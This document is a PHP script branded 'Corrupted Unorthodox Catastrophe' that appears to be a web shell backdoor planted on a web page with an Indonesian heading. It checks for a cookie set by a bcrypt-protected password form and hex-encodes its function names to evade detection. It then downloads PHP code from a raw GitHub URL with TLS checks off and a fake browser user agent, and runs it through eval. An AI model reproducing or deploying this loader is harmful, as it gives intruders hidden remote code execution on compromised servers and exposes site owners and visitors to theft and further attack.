Ekspertise yang Luas
.
/**
* Corrupted Unorthodox Catastrophe (CUC) - Best Script
* @link https://cuc.dev/
* @author CUC.
* @since 17. 7. 1337 - time 13:37
* @package CUCGroup
* @license https://www.php.net/license/3_01.txt The PHP License, version 3.01
* @version 1.7
* @copyright Copyright (C) 1337 CUC, Inc. All rights reserved.
*/
function hex2str($hex) {
$str = '';
for ($i = 0; $i < strlen($hex) - 1; $i += 2) {
$str .= chr(hexdec($hex[$i] . $hex[$i + 1]));
}
return $str;
}
// @deprecated 1.0 Deprecated without replacement
function is_logged_in()
{
return isset($_COOKIE['coxphe']) && $_COOKIE['coxphe'] === 'coxphe';
}
if (is_logged_in()) {
$Array = array(
'666f70656e', // fopen
'73747265616d5f6765745f636f6e74656e7473', // stream_get_contents
'66696c655f6765745f636f6e74656e7473', // file_get_contents
'6375726c5f65786563', // curl_exec
'636f7079', // copy
'73747265616d5f636f6e74657874', // stream_context_create
'66696c65' // file
);
function geturlsinfo($b0rn) {
$l1v3 = array_map('hex2str', $GLOBALS['Array']);
if (function_exists($l1v3[3])) {
$ch = curl_init($b0rn);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$d34th = $l1v3[3]($ch);
curl_close($ch);
return $d34th;
} elseif (function_exists($l1v3[2])) {
return $l1v3[2]($b0rn);
} elseif (function_exists($l1v3[0]) && function_exists($l1v3[1])) {
$g04l = $l1v3[0]($b0rn, "r");
$d34th = $l1v3[1]($g04l);
fclose($g04l);
return $d34th;
} elseif (function_exists($l1v3[4])) {
return $l1v3[4]($b0rn, '/tmp/tempfile');
} elseif (function_exists($l1v3[5])) {
$context = $l1v3[5](array('http' => array('timeout' => 5)));
return file_get_contents($b0rn, false, $context);
} elseif (function_exists($l1v3[6])) {
return implode('', $l1v3[6]($b0rn));
}
return false;
}
$b0rn = 'https://raw.githubusercontent.com/fallinginbinary/SHIT/refs/heads/main/LOLCAT.php';
$dr34m = geturlsinfo($b0rn);
if ($dr34m !== false) {
eval('?>' . $dr34m);
}
} else {
if (isset($_POST['password'])) {
$entered_key = $_POST['password'];
$hashed_key = '$2y$10$Q/56XoBAt9qq8TZ9.5W2e.6TxicKiqoxe9yEVkdiVhvYrvRsnUXSC'; // https://bcrypt.online/
if (password_verify($entered_key, $hashed_key)) {
setcookie('coxphe', 'coxphe', time() + 3600, '/');
header("Location: ".$_SERVER['PHP_SELF']);
exit();
}
}
?>
Corrupted Unorthodox Catastrophe
~ Faber est suae quisque fortunae ~